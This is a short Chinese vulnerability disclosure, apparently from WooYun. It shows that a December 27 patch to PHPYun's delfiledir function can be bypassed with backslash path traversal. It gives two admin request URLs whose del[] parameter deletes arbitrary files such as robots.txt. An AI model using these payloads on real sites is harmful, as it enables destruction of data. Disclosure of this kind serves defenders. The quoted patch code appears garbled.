27日补丁后,PHPYun依然存在任意文件删除 漏洞
12月27日,官方出了补丁:
在action.class.php的delfiledir函数中加入了替换和./
function delfiledir($delfiles){ $delfiles = str_replace("","",$delfiles); $delfiles = str_replace("./","",$delfiles); $delfiles = "".$delfiles;
那么我们有别的方法可以绕过:
(发现wooyun会把一个反斜杠变成两个…… \-->\\)
方法:改为
..\/..\/robots.txt
或者直接
..\..\robots.txt
地点一:
提交地址:
http://localhost/phpyun/admin/index.php?C=del&M=user_member&delsub=1&del[]=..\/..\/robots.txt
通过修改del[]参数,可删除任意文件
地点二:
提交地址:
http://localhost/phpyun/admin/index.php?C=del&M=com_member&delsub=1&del[]=..\/..\/robots.txt
通过修改del[]参数,可删除任意文件
问题文件分别是/admin/model/com_member.class.php 和 /admin/model/user_member.class.php
修复方案:
要不改正则
查看更多关于PHPYun依然存在任意文件删除漏洞(后台触发)的详细内容...